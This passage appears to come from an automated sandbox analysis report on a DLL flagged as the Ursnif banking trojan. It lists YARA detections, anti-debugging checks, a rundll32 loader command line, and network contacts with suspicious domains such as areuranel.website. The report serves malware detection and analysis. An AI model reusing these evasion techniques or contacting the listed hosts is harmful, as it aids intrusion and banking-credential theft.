                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb<{K@a source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb9 source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb[ source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000002.00000002.682655563.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.683978405.000000006E94B000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.548616295.000000006E94B000.00000002.00020000.sdmp, 616412739e268.dll
                      Source: Binary string: msctf.pdb# source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb% source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000012.00000003.512896544.00000000056F4000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524096098.00000000050E2000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535030009.0000000004BC4000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000018.00000003.521770649.000000000090B000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000012.00000003.512884902.00000000056F0000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524424631.00000000050E0000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.534997443.0000000004BC0000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000018.00000003.521737000.0000000000905000.00000004.00000001.sdmp
                      Source: Binary string: sfc.pdbm source: WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp, WerFault.exe, 00000016.00000003.524451531.00000000050E8000.00000004.00000040.sdmp, WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524272653.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000012.00000003.512757013.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.534288689.0000000004BF1000.00000004.00000001.sdmp
                      Source: Binary string: msctf.pdb"{M@C source: WerFault.exe, 00000018.00000003.535082330.0000000004BC7000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.512903037.00000000056F7000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D21A3 push ecx; ret 2_2_6E8D21B3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D2150 push ecx; ret 2_2_6E8D2159
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3EC72 push D5DD2AEAh; iretd 2_2_00A3ECD6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3ABE0 push ecx; ret 2_2_00A3ABE9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_00A3AF13 push ecx; ret 2_2_00A3AF23
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E90AB9A push ecx; ret 2_2_6E90ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031AAF13 push ecx; ret 6_2_031AAF23
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031AABE0 push ecx; ret 6_2_031AABE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_031AEC72 push D5DD2AEAh; iretd 6_2_031AECD6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E90AB9A push ecx; ret 6_2_6E90ABAD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E90AB9A push ecx; ret 9_2_6E90ABAD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D1DE5 LoadLibraryA,GetProcAddress,2_2_6E8D1DE5

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000006.00000003.533746725.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636681449.000000000302F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533976694.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504323310.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533515882.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.534880581.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504453147.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504380266.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504256505.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504206651.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504111647.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533633690.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533322281.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533883648.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504159265.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.668796165.000000000585F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.625115852.000000000595D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.547848145.000000000322B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.579417295.0000000005A5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504691166.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.504416763.00000000033A8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533401474.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.593657647.000000000312D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.533448207.0000000005BD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681690642.0000000002FB0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.318a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.3.rundll32.exe.10ba31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.6e8d0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.31a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.2d494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.a30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.53794a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.0.rundll32.exe.6e8d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.3.rundll32.exe.109a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.loaddll32.exe.b3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.10da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.431870114.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.446004934.0000000001090000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.468068395.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.682624549.0000000005379000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.469511127.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.430400747.0000000003180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.681378105.0000000002D49000.00000004.00000040.sdmp, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: WerFault.exe, 00000018.00000002.553524158.0000000004891000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWP
                      Source: loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmp, WerFault.exe, 00000012.00000002.531474027.0000000005282000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.541015107.0000000004C87000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.549834890.00000000047C4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: loaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWen-USn7
                      Source: WerFault.exe, 00000012.00000002.531217612.0000000005260000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWH
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6E916CB3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E8D1DE5 LoadLibraryA,GetProcAddress,2_2_6E8D1DE5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E92C325 mov eax, dword ptr fs:[00000030h]2_2_6E92C325
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E938861 mov eax, dword ptr fs:[00000030h]2_2_6E938861
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E97DFDA mov eax, dword ptr fs:[00000030h]2_2_6E97DFDA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E97DEAA mov eax, dword ptr fs:[00000030h]2_2_6E97DEAA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E97DBB5 push dword ptr fs:[00000030h]2_2_6E97DBB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E92C325 mov eax, dword ptr fs:[00000030h]6_2_6E92C325
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E938861 mov eax, dword ptr fs:[00000030h]6_2_6E938861
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E97DFDA mov eax, dword ptr fs:[00000030h]6_2_6E97DFDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E97DEAA mov eax, dword ptr fs:[00000030h]6_2_6E97DEAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E97DBB5 push dword ptr fs:[00000030h]6_2_6E97DBB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E92C325 mov eax, dword ptr fs:[00000030h]9_2_6E92C325
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E938861 mov eax, dword ptr fs:[00000030h]9_2_6E938861
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E97DFDA mov eax, dword ptr fs:[00000030h]9_2_6E97DFDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E97DEAA mov eax, dword ptr fs:[00000030h]9_2_6E97DEAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E97DBB5 push dword ptr fs:[00000030h]9_2_6E97DBB5
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6E916CB3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E90B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6E90B316
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6E916CB3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_6E90B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6E90B316
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E916CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_6E916CB3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_6E90B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_6E90B316

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.98.207.210 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.60.226 187Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1Jump to behavior
